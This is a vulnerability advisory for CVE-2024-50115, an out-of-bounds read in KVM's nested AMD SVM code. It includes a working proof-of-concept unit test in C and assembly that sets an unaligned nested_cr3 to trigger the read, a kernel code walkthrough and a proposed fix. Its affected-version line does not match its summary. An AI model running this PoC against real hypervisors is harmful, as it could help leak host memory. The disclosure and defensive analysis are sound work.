
KVM: Out-Of-Bounds Read in nested_svm_get_tdp_pdptr

Moderate
rcorrea35 published GHSA-h65x-r3mq-jr2v Dec 9, 2024

Package

KVM (Linux)

Affected versions

> 3.2

Patched versions

5.15.170, 6.1.115, 6.6.59, 6.11.6, 6.12-rc5

Description

Summary

An Out-Of-Bounds (OOB) read affecting KVM since v3.10 was discovered in arch/x86/kvm/svm/nested.c. The memory read is from the user-space process managing the associated KVM-based Virtual Machine (VM). The values passed from nested_svm_get_tdp_pdptr are not masked to prevent the access from crossing a page boundary, and __kvm_read_guest_page lacks similar validation.

Severity

Moderate - The nested_svm_get_tdp_pdptr function allows a guest Virtual Machine Monitor (VMM) to read memory OOB from its guest physical address (GPA) space. The data read is used to construct Nested Page Tables (NPT) and could be used to indirectly leak memory in the host virtual address (HVA) space.

QEMU was used to develop the PoC; in that environment the OOB access results in __copy_from_user returning an error and __kvm_read_guest_page returning -EFAULT, because QEMU adds a guard page directly before and after each memory region. Other products utilizing KVM could have different outcomes.

Proof-of-Concept

A kvm-unit-test was developed that creates a 32-bit protected-mode nested VMM with PAE enabled. It reuses existing code from the project and switches the nested VMM from 64-bit long mode to the required system state and back after executing the VMRUN instruction. This setup triggers the nested_svm_get_tdp_pdptr execution path in KVM.

Modifying the vmcb->control.nested_cr3 value to a GPA at the edge of any memory slot will cause the OOB read to take place. Multiple locations meet this criterion, but they vary based on the attached virtual devices and the amount of memory.

Testing with QEMU resulted in a return value of -EFAULT because it places guard pages at the start and end of every memory region exposed to the VM. Other applications leveraging KVM could have different results.

Build and Run with kvm-unit-test

  1. Copy svm_p32pae_ncr3.c and _svm_p32pae_ncr3.S to the x86 directory
  2. Update Makefile.x86_64 in the x86 directory to include the contents from the snippet below
  3. Run QEMU with qemu-system-x86_64 -enable-kvm -cpu host -m size=2048 -serial stdio -kernel svm_p32pae_ncr3.flat
// Makefile.x86_64
...
# add this line right before the "include $(SRCDIR)/$(TEST_DIR)/Makefile.common" line
tests += $(TEST_DIR)/svm_p32pae_ncr3.$(exe)
...
# add this line to the end of the file
$(TEST_DIR)/svm_p32pae_ncr3.$(bin): $(TEST_DIR)/svm_p32pae_ncr3.o $(TEST_DIR)/_svm_p32pae_ncr3.o
// svm_p32pae_ncr3.c

#include "x86/fwcfg.h"
#include "x86/msr.h"
#include "x86/processor.h"
#include "alloc_page.h"
#include "desc.h"
#include "vmalloc.h"
#include "x86/asm/page.h"
#include "alloc_phys.h"

#define SVM_EXIT_VMMCALL 0x081
#define SVM_EXIT_SHUTDOWN 0x07f
#define SVM_EXIT_NPF 0x400

#define MSR_BITMAP_SIZE 8192

#define TLB_CONTROL_FLUSH_ALL_ASID 1

#define SVM_SELECTOR_S_SHIFT 4
#define SVM_SELECTOR_P_SHIFT 7
#define SVM_SELECTOR_DB_SHIFT 10
#define SVM_SELECTOR_G_SHIFT 11

#define SVM_SELECTOR_S_MASK (1 << SVM_SELECTOR_S_SHIFT)
#define SVM_SELECTOR_P_MASK (1 << SVM_SELECTOR_P_SHIFT)
#define SVM_SELECTOR_DB_MASK (1 << SVM_SELECTOR_DB_SHIFT)
#define SVM_SELECTOR_G_MASK (1 << SVM_SELECTOR_G_SHIFT)

enum {
  INTERCEPT_INTR,
  INTERCEPT_NMI,
  INTERCEPT_SMI,
  INTERCEPT_INIT,
  INTERCEPT_VINTR,
  INTERCEPT_SELECTIVE_CR0,
  INTERCEPT_STORE_IDTR,
  INTERCEPT_STORE_GDTR,
  INTERCEPT_STORE_LDTR,
  INTERCEPT_STORE_TR,
  INTERCEPT_LOAD_IDTR,
  INTERCEPT_LOAD_GDTR,
  INTERCEPT_LOAD_LDTR,
  INTERCEPT_LOAD_TR,
  INTERCEPT_RDTSC,
  INTERCEPT_RDPMC,
  INTERCEPT_PUSHF,
  INTERCEPT_POPF,
  INTERCEPT_CPUID,
  INTERCEPT_RSM,
  INTERCEPT_IRET,
  INTERCEPT_INTn,
  INTERCEPT_INVD,
  INTERCEPT_PAUSE,
  INTERCEPT_HLT,
  INTERCEPT_INVLPG,
  INTERCEPT_INVLPGA,
  INTERCEPT_IOIO_PROT,
  INTERCEPT_MSR_PROT,
  INTERCEPT_TASK_SWITCH,
  INTERCEPT_FERR_FREEZE,
  INTERCEPT_SHUTDOWN,
  INTERCEPT_VMRUN,
  INTERCEPT_VMMCALL,
  INTERCEPT_VMLOAD,
  INTERCEPT_VMSAVE,
  INTERCEPT_STGI,
  INTERCEPT_CLGI,
  INTERCEPT_SKINIT,
  INTERCEPT_RDTSCP,
  INTERCEPT_ICEBP,
  INTERCEPT_WBINVD,
  INTERCEPT_MONITOR,
  INTERCEPT_MWAIT,
  INTERCEPT_MWAIT_COND,
};

struct __attribute__((__packed__)) vmcb_seg {
  u16 selector;
  u16 attrib;
  u32 limit;
  u64 base;
};

struct __attribute__((__packed__)) vmcb_control_area {
  u16 intercept_cr_read;
  u16 intercept_cr_write;
  u16 intercept_dr_read;
  u16 intercept_dr_write;
  u32 intercept_exceptions;
  u64 intercept;
  u8 reserved_1[42];
  u16 pause_filter_count;
  u64 iopm_base_pa;
  u64 msrpm_base_pa;
  u64 tsc_offset;
  u32 asid;
  u8 tlb_ctl;
  u8 reserved_2[3];
  u32 int_ctl;
  u32 int_vector;
  u32 int_state;
  u8 reserved_3[4];
  u32 exit_code;
  u32 exit_code_hi;
  u64 exit_info_1;
  u64 exit_info_2;
  u32 exit_int_info;
  u32 exit_int_info_err;
  u64 nested_ctl;
  u8 reserved_4[16];
  u32 event_inj;
  u32 event_inj_err;
  u64 nested_cr3;
  u64 lbr_ctl;
  u32 clean;
  u32 reserved_5;
  u64 next_rip;
  u8 insn_len;
  u8 insn_bytes[15];
  u8 reserved_6[800];
};

struct __attribute__((__packed__)) vmcb_save_area {
  struct vmcb_seg es;
  struct vmcb_seg cs;
  struct vmcb_seg ss;
  struct vmcb_seg ds;
  struct vmcb_seg fs;
  struct vmcb_seg gs;
  struct vmcb_seg gdtr;
  struct vmcb_seg ldtr;
  struct vmcb_seg idtr;
  struct vmcb_seg tr;
  u8 reserved_1[43];
  u8 cpl;
  u8 reserved_2[4];
  u64 efer;
  u8 reserved_3[112];
  u64 cr4;
  u64 cr3;
  u64 cr0;
  u64 dr7;
  u64 dr6;
  u64 rflags;
  u64 rip;
  u8 reserved_4[88];
  u64 rsp;
  u8 reserved_5[24];
  u64 rax;
  u64 star;
  u64 lstar;
  u64 cstar;
  u64 sfmask;
  u64 kernel_gs_base;
  u64 sysenter_cs;
  u64 sysenter_esp;
  u64 sysenter_eip;
  u64 cr2;
  u8 reserved_6[32];
  u64 g_pat;
  u64 dbgctl;
  u64 br_from;
  u64 br_to;
  u64 last_excp_from;
  u64 last_excp_to;
};

struct __attribute__((__packed__)) vmcb {
  struct vmcb_control_area control;
  struct vmcb_save_area save;
};

struct regs {
  u64 rax;
  u64 rbx;
  u64 rcx;
  u64 rdx;
  u64 cr2;
  u64 rbp;
  u64 rsi;
  u64 rdi;
  u64 r8;
  u64 r9;
  u64 r10;
  u64 r11;
  u64 r12;
  u64 r13;
  u64 r14;
  u64 r15;
  u64 rflags;
};

void svm_p32pae_ncr3_vm_main(void);
void svm_p32pae_ncr3_run_test(void);

struct regs regs;
struct vmcb *vmcb;
void *hsave;

u64 *pte[2048];
u64 *pde[4];
u64 *pdpe;

u8 *io_bitmap;
u8 io_bitmap_area[16384];

u8 *msr_bitmap;
u8 msr_bitmap_area[MSR_BITMAP_SIZE + PAGE_SIZE];

static void vmcb_set_seg(struct vmcb_seg *seg, u16 selector, u64 base,
                         u32 limit, u32 attr) {
  seg->selector = selector;
  seg->attrib = attr;
  seg->limit = limit;
  seg->base = base;
}

static void svm_p32pae_setup(void) {
  struct vmcb_save_area *save = &vmcb->save;
  struct vmcb_control_area *ctrl = &vmcb->control;
  u64 *page, address;
  struct descriptor_table_ptr desc_table_ptr;
  int i, j;

  printf("svm_p32pae_setup\n");

  wrmsr(MSR_VM_HSAVE_PA, (u64)hsave);
  wrmsr(MSR_EFER, rdmsr(MSR_EFER) | EFER_SVME);

  io_bitmap = (void *)ALIGN((ulong)io_bitmap_area, PAGE_SIZE);

  msr_bitmap = (void *)ALIGN((ulong)msr_bitmap_area, PAGE_SIZE);

  u32 data_seg_attr = 3 | SVM_SELECTOR_S_MASK | SVM_SELECTOR_P_MASK |
                      SVM_SELECTOR_DB_MASK | SVM_SELECTOR_G_MASK;
  u32 code_seg_attr = 9 | SVM_SELECTOR_S_MASK | SVM_SELECTOR_DB_MASK |
                      SVM_SELECTOR_P_MASK | SVM_SELECTOR_G_MASK;

  memset(vmcb, 0, sizeof(*vmcb));
  asm volatile("vmsave %0" : : "a"(vmcb) : "memory");

  // set up es, cs, ds, and ss segments for protected mode
  vmcb_set_seg(&save->es, KERNEL_DS32, 0, -1U, data_seg_attr);
  vmcb_set_seg(&save->cs, KERNEL_CS32, 0, -1U, code_seg_attr);
  vmcb_set_seg(&save->ds, KERNEL_DS32, 0, -1U, data_seg_attr);
  vmcb_set_seg(&save->ss, KERNEL_DS32, 0, -1U, data_seg_attr);

  sgdt(&desc_table_ptr);
  vmcb_set_seg(&save->gdtr, 0, desc_table_ptr.base, desc_table_ptr.limit, 0);

  sidt(&desc_table_ptr);
  vmcb_set_seg(&save->idtr, 0, desc_table_ptr.base, desc_table_ptr.limit, 0);

  ctrl->asid = 1;

  save->cpl = 0;
  save->efer = rdmsr(MSR_EFER) &
               ~(_EFER_LME | _EFER_LMA);  // disable long mode in the guest
  save->cr4 = read_cr4();
  save->cr0 = read_cr0() & ~X86_CR0_PG; // disable paging in the guest
  save->dr7 = read_dr7();
  save->dr6 = read_dr6();
  save->cr2 = read_cr2();
  save->g_pat = rdmsr(MSR_IA32_CR_PAT);
  save->dbgctl = rdmsr(MSR_IA32_DEBUGCTLMSR);
  ctrl->intercept = (1ULL << INTERCEPT_VMRUN) | (1ULL << INTERCEPT_VMMCALL);
  ctrl->iopm_base_pa = (u64)io_bitmap;
  ctrl->msrpm_base_pa = (u64)msr_bitmap;

  address = 0;

  /* PTE level */
  for (i = 0; i < 2048; ++i) {
    page = alloc_page();

    /* 4 KiB page mappings: flags P | RW | US | A | D */
    for (j = 0; j < 512; ++j, address += 4096) page[j] = address | 0x067ULL;

    pte[i] = page;
  }

  /* PDE level */
  for (i = 0; i < 4; ++i) {
    page = alloc_page();

    /* point each PDE at a PTE page: flags P | RW | US | A */
    for (j = 0; j < 512; ++j) page[j] = (u64)pte[(i * 512) + j] | 0x027ULL;

    pde[i] = page;
  }

  /* PDPE level */
  pdpe = alloc_page();
  /* PAE PDPTEs set only the present bit */
  for (i = 0; i < 4; ++i) pdpe[i] = ((u64)(pde[i])) | 0x01ULL;

  save->cr3 = (u64)pdpe;

  ctrl->nested_ctl = 1;
  ctrl->nested_cr3 = (u64)pdpe;
  ctrl->tlb_ctl = TLB_CONTROL_FLUSH_ALL_ASID;

  // clear the exit code and info fields
  vmcb->control.exit_code = 0;
  vmcb->control.exit_info_1 = 0;
  vmcb->control.exit_info_2 = 0;
}

int main(int argc, char *argv[]) {
  void *stack;
  pteval_t opt_mask = 0;
  
  printf("VM Started...\n");

  __setup_vm(&opt_mask);

  if (!this_cpu_has(X86_FEATURE_SVM)) {
    printf("SVM not availble\n");
    exit(-1);
  }

  if (!this_cpu_has(X86_FEATURE_NPT)) {
    printf("NPT not availble\n");
    exit(-1);
  }

  vmcb = alloc_page();
  hsave = alloc_page();

  svm_p32pae_setup();

  stack = alloc_page();
  vmcb->save.rsp = ((ulong)stack) + PAGE_SIZE;
  vmcb->save.rip = (ulong)&svm_p32pae_ncr3_vm_main;
  vmcb->save.rax = ~0ULL;

  printf("svm_p32pae_ncr3_vm_main @ %p\n", &svm_p32pae_ncr3_vm_main);

  // use the nested_cr3 page tables for the vmm page tables
  // after the switch to protected mode
  regs.rsi = vmcb->control.nested_cr3;

  // set nested_cr3 to a gpa that would be at a boundary
  // this value was obtained by running `info mtree` from the monitor cli
  vmcb->control.nested_cr3 = 0x3fffffff;
  
  svm_p32pae_ncr3_run_test();

  printf("guest rip: 0x%lx\n", vmcb->save.rip);
  printf("guest rax: 0x%lx\n", vmcb->save.rax);

  switch (vmcb->control.exit_code) {
    case SVM_EXIT_VMMCALL:
      printf("exit_code == SVM_EXIT_VMMCALL\n");
      break;
    default:
      printf("exit_code == %x\n", vmcb->control.exit_code);
      break;
  }

  printf("VM Stopped...\n");

  exit(0);
}
// _svm_p32pae_ncr3.S

.extern regs
.extern vmcb

xchg_gprs:
  xchg %rbx, regs+0x8
  xchg %rcx, regs+0x10
  xchg %rdx, regs+0x18
  xchg %rbp, regs+0x28
  xchg %rsi, regs+0x30
  xchg %rdi, regs+0x38
  xchg %r8, regs+0x40
  xchg %r9, regs+0x48
  xchg %r10, regs+0x50
  xchg %r11, regs+0x58
  xchg %r12, regs+0x60
  xchg %r13, regs+0x68
  xchg %r14, regs+0x70
  xchg %r15, regs+0x78
  ret

switch_to_protected_pae_mode:
  ljmp *1f
1:
.long 2f
.long 0x20 // KERNEL_CS32
.code32 // switch to 32-bit code
2:

  push %eax
  push %ecx
  push %edx

  movl %cr0, %eax
  btcl $31, %eax /* clear PG */
  movl %eax, %cr0

  movl $0xc0000080, %ecx
  rdmsr
  btcl $8, %eax /* clear LME */
  wrmsr

  movl %cr3, %eax
  movl %esi, %cr3 // restore cr3 from guest esi
  movl %eax, %esi

  movl %cr0, %eax
  btsl $31, %eax /* set PG */
  movl %eax, %cr0

  ljmpl $0x20, $1f
1:

  pop %edx
  pop %ecx
  pop %eax

  ret
.code64 // restore 64-bit code mode

switch_to_long_mode:
.code32 //switch to 32-bit code
  push %eax
  push %ecx
  push %edx

  movl %cr0, %eax
  btcl  $31, %eax /* clear PG */
  movl %eax, %cr0

  movl %cr3, %eax
  movl %esi, %cr3 // restore cr3 from guest esi
  movl %eax, %esi

  movl $0xc0000080, %ecx
  rdmsr
  btsl $8, %eax /* set LME */
  wrmsr

  movl %cr0, %eax
  btsl  $31, %eax /* set PG */
  movl %eax, %cr0

  pop %edx // per the AMD manual this isn't correct,
  pop %ecx // but the VM seems okay with a few pops
  pop %eax // before the switch to long mode
  ljmp *1f
1:
.long 2f
.long 0x08 //KERNEL_CS64
.code64 // make this 64-bit code
2:
  ret

.global svm_p32pae_ncr3_run_test
svm_p32pae_ncr3_run_test:
        
  call xchg_gprs

  call switch_to_protected_pae_mode
.code32

  mov vmcb, %eax
  vmload %eax

  vmrun %eax
  //.byte 0xeb, 0xfe
  
  mov vmcb, %eax
  vmsave %eax

  call switch_to_long_mode
.code64

  call xchg_gprs

  ret


.global svm_p32pae_ncr3_vm_main
svm_p32pae_ncr3_vm_main:
.code32
  mov $0x42424242, %eax
  vmmcall

Further Analysis

A guest VMM leveraging AMD’s Secure Virtual Machine (SVM) extensions with NPT enabled can access memory outside of its GPA space by specifying an unaligned NPT Control Register 3 (CR3) value in its Virtual Machine Control Block (VMCB). From protected mode with Physical Address Extension (PAE) enabled, a guest VMM can set NP_ENABLE and populate the N_CR3 field in the VMCB with an unaligned GPA. In this configuration CR3 points to a Page Directory Pointer Table (PDPT) with 4 entries of 8 bytes each. KVM processes the VMCB when the guest VMM executes the VMRUN instruction.

KVM uses a function pointer in the kvm_mmu structure named get_pdptr to load a PDPT register. When a nested VMM has SVM_NESTED_CTL_NP_ENABLE set in nested_ctl, that function pointer is set to nested_svm_get_tdp_pdptr.

When nested_svm_get_tdp_pdptr is called, the nested_cr3 value in the svm->nested.ctl structure contains the guest-VMM-controlled GPA of the PDPT and is loaded into the local u64 cr3 variable. It is then used to compute the gfn_t gfn with gpa_to_gfn(cr3) and the int offset with offset_in_page(cr3) + index * 8. These values are passed to kvm_vcpu_read_guest_page.

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/kvm_host.h

static inline gfn_t gpa_to_gfn(gpa_t gpa)
{
        return (gfn_t)(gpa >> PAGE_SHIFT);
}
// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/mm.h

#define offset_in_page(p)       ((unsigned long)(p) & ~PAGE_MASK)
// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/arch/x86/kvm/svm/nested.c

static u64 nested_svm_get_tdp_pdptr(struct kvm_vcpu *vcpu, int index)
{
        struct vcpu_svm *svm = to_svm(vcpu);
        u64 cr3 = svm->nested.ctl.nested_cr3;
        u64 pdpte;
        int ret;

        ret = kvm_vcpu_read_guest_page(vcpu, gpa_to_gfn(cr3), &pdpte,
                                       offset_in_page(cr3) + index * 8, 8);
        if (ret)
                return 0;
        return pdpte;
}

kvm_vcpu_read_guest_page uses the gfn_t gfn to get the kvm_memory_slot *slot and calls __kvm_read_guest_page. __kvm_read_guest_page uses the gfn_t gfn passed to it to get an HVA using gfn_to_hva_memslot_prot and then calls __copy_from_user with addr + offset.

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/virt/kvm/kvm_main.c

int kvm_vcpu_read_guest_page(struct kvm_vcpu *vcpu, gfn_t gfn, void *data,
                             int offset, int len)
{
        struct kvm_memory_slot *slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn);

        return __kvm_read_guest_page(slot, gfn, data, offset, len);
}

static int __kvm_read_guest_page(struct kvm_memory_slot *slot, gfn_t gfn,
                                 void *data, int offset, int len)
{
        int r;
        unsigned long addr;

        addr = gfn_to_hva_memslot_prot(slot, gfn, NULL);
        if (kvm_is_error_hva(addr))
                return -EFAULT;
        r = __copy_from_user(data, (void __user *)addr + offset, len);
        if (r)
                return -EFAULT;
        return 0;
}

Because CR3 in protected mode with PAE enabled only needs to be 32-byte aligned, and KVM does not perform any alignment checking on the nested_cr3 value, it can be set to any address in the GPA space.

It should be noted that "Volume 2: System Programming" of the "AMD64 Architecture Programmer’s Manual" does not identify any bits for the N_CR3 field as RESERVED, SBZ or otherwise in "Appendix B VMCB Layout" as it does for other fields in Table B-1. Section 15.25.4 does describe nCR3 as, "the version of CR3 to be used while the nested-paging guest is running", and then states "Any MBZ bit of nCR3 is set" as an illegal state combination. Lastly, Figure 3-5 describes CR3 in "Legacy-Mode PAE Paging" as only using bits 31:5 for the address.

For example, if a guest VMM set N_CR3 in the VMCB to the last page of a memory slot with an offset of 0xfff and executed VMRUN, the following would occur:

  1. nested_svm_get_tdp_pdptr would be called and use the guest-VMM-controlled N_CR3 to compute the gfn and offset passed to kvm_vcpu_read_guest_page
  2. gpa_to_gfn(cr3) would pass the gfn associated with the nested_cr3 value
  3. offset_in_page(cr3) + index * 8 would pass 0xfff, 0x1007, 0x100f, or 0x1017 depending on index, which can be 0 through 3 (see the arithmetic sketch after this list)
  4. kvm_vcpu_read_guest_page gets the slot for the nested_cr3 gfn and calls __kvm_read_guest_page
  5. __kvm_read_guest_page calls gfn_to_hva_memslot_prot to get the HVA and checks it with kvm_is_error_hva
  6. __copy_from_user is called with addr + offset, which results in a read across the page boundary and outside of the memory slot previously checked
  7. If this read succeeds, the returned value is used by KVM as a pdptr; if it fails, kvm_vcpu_read_guest_page returns -EFAULT and nested_svm_get_tdp_pdptr returns 0
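
As a quick illustration of steps 3 and 6, the stand-alone sketch below (not kernel code; it assumes the usual 4 KiB page size and simply mirrors the gpa_to_gfn and offset_in_page arithmetic) computes the four PDPTE offsets for a nested_cr3 of 0x3fffffff, the value used by the PoC, and shows that every 8-byte read extends past the end of the page identified by the gfn:

// pdpte_offsets.c - stand-alone sketch of the offset arithmetic, not kernel code

#include <stdio.h>
#include <stdint.h>

#define PAGE_SHIFT 12
#define PAGE_SIZE (1UL << PAGE_SHIFT)

int main(void)
{
        /* GPA at the very end of a memory slot, as used by the PoC */
        uint64_t nested_cr3 = 0x3fffffffULL;
        uint64_t gfn = nested_cr3 >> PAGE_SHIFT;        /* gpa_to_gfn() */
        uint64_t base = nested_cr3 & (PAGE_SIZE - 1);   /* offset_in_page() */

        for (int index = 0; index < 4; index++) {
                uint64_t offset = base + index * 8;
                printf("index %d: gfn 0x%llx offset 0x%llx%s\n", index,
                       (unsigned long long)gfn, (unsigned long long)offset,
                       offset + 8 > PAGE_SIZE ? " (read crosses the page boundary)" : "");
        }
        return 0;
}

Note that an architecturally aligned CR3 could not trigger this: the largest 32-byte-aligned offset within a page is 0xfe0, and 0xfe0 + 3 * 8 + 8 = 0x1000 ends exactly at the page boundary.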

nested_cr3 could be checked to ensure that it is 32-byte aligned, but this bug identifies a larger issue with the underlying __kvm_read_guest_page function. Specifically, if this function is meant to operate on a single page, as the name implies, it needs to ensure the entire access stays within page bounds.
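
As an illustration of that point, the sketch below adds such a check to the __kvm_read_guest_page code quoted earlier. This is only a sketch of the idea described above, not necessarily the patch that shipped in the fixed versions:

static int __kvm_read_guest_page(struct kvm_memory_slot *slot, gfn_t gfn,
                                 void *data, int offset, int len)
{
        int r;
        unsigned long addr;

        /* Sketch: reject any access that does not fit entirely within the
         * single page identified by gfn. */
        if (offset < 0 || len < 0 || offset + len > PAGE_SIZE)
                return -EFAULT;

        addr = gfn_to_hva_memslot_prot(slot, gfn, NULL);
        if (kvm_is_error_hva(addr))
                return -EFAULT;
        r = __copy_from_user(data, (void __user *)addr + offset, len);
        if (r)
                return -EFAULT;
        return 0;
}

A check at this layer covers every caller that can pass an attacker-influenced offset, whereas masking or alignment-checking nested_cr3 would only address this particular path.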

The addition of nested virtualization presents an indirect interface from a VM to KVM, through the VMCB on AMD CPUs, that was not previously controllable by a VM. Existing code that was updated to support this functionality should be reviewed further to ensure inputs are properly validated.

Timeline

Date reported: 08/27/2024
Date fixed: 11/05/2024
Date disclosed: 12/09/2024

Severity

Moderate

CVE ID

CVE-2024-50115

Weaknesses

No CWEs

Credits